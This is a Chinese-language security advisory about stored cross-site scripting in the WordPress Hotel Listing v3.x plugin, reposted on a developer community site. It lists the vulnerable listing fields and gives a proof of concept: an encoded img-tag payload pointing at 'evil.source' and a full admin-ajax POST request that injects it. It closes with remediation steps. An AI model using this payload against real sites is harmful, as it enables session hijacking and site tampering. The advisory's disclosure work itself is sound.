前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >WordPress Plugin Hotel Listing 3 - 'Multiple' 跨站脚本 (XSS)

WordPress Plugin Hotel Listing 3 - 'Multiple' 跨站脚本 (XSS)

原创
作者头像
Khan安全团队
发布2021-12-17 15:34:28
3630
发布2021-12-17 15:34:28
举报
文章被收录于专栏:Khan安全团队Khan安全团队

受影响的产品:

电子插件 产品: Hotel Listing v3.x - 插件 Wordpress(Web 应用程序)

受限身份验证(访客权限)

低用户交互

在官方 Hotel Listing v3.x wordpress 插件 web 应用程序中发现了多个持久输入验证 web 漏洞。 该漏洞允许远程攻击者通过持续攻击向量注入自己的恶意脚本代码来危害浏览器 来自应用程序端的 Web 应用程序请求。

这些漏洞位于 my-account 模块的添加新列表 - 地址、城市、邮政编码、国家和位置输入字段中。 远程攻击者可以注册一个低权限的应用程序用户帐户,将自己的恶意脚本代码和持久性攻击向量注入到 劫持用户/管理员会话凭据或永久操纵受影响的模块。恶意注入脚本代码的执行需要 放置在前端的预览中,但也可以在交互的后端中通过管理帐户进行编辑或列出(?&profile=all-post)。 注入的请求方法是 post,攻击向量是持久的,位于应用程序端。

请求方法: [+] 发布

易受攻击的模块: [+] 添加新列表

易受攻击的输入: [+] 地址 [+] 城市 [+] 邮政编码 [+] 国家

受影响的模块: [+] 前端预览(所有列表) [+] 后端预览(所有列表)或编辑

概念证明(PoC):

具有特权用户帐户且用户交互较少的远程攻击者可以利用持久性 Web 漏洞。 要进行安全演示或重现漏洞,请按照以下提供的信息和步骤继续操作。

有效载荷 %22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E

代码语言:javascript
复制
http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php

action=iv_directories_save_listing&form_data=cpt_page=hotel&title=test1&new_post_content=test2&logo_image_id=&feature_image_id= 
&gallery_image_ids=&post_status=pending&postcats%5B%5D=&address=%22%3E%25220%3E%25220%3E%3C520%3E%3D =%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E& 
city=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22% 3E&邮政编码=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
状态=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22 %3E&country=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
纬度=&经度=&new_tag=&phone=&fax=&contact-email=&contact_web=&award_title%5B%5D=&award_description %5B%5D=&
Award_year%5B%5D=&menu_title%5B%5D=&menu_description%5B%5D=&menu_price%5B%5D=&menu_order%5B%5D=&room_title%5B%5D=&room_description%5B%5D=&room_price%5B%5D=& 
room_order %5B%5D=&override_bookingf=no&booking_stcode=&youtube=&vimeo=&facebook=&linkedin=&twitter=&gplus=&pinterest=&instagram=&Rooms=&suites=& 
Rating_stars=&CHECK_IN=&CHECK_out=&Cancellation=&Pets=&Children_nameds=Monday+B&B &day_value1%5B%5D=& 
day_value2%5B%5D=&event-title=&event-detail=++&event_image_id=&user_post_id=&_wpnonce=50241bc992 


解决方案 - 修复和补丁:
======================== 
1. 编码并解析所有易受攻击的输入字段在通过 post 方法请求传输时
2. 限制输入字段以禁止使用特殊字符
3. 在编辑和列表中对输出内容进行编码和转义以防止执行点

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
多因子身份认证
多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档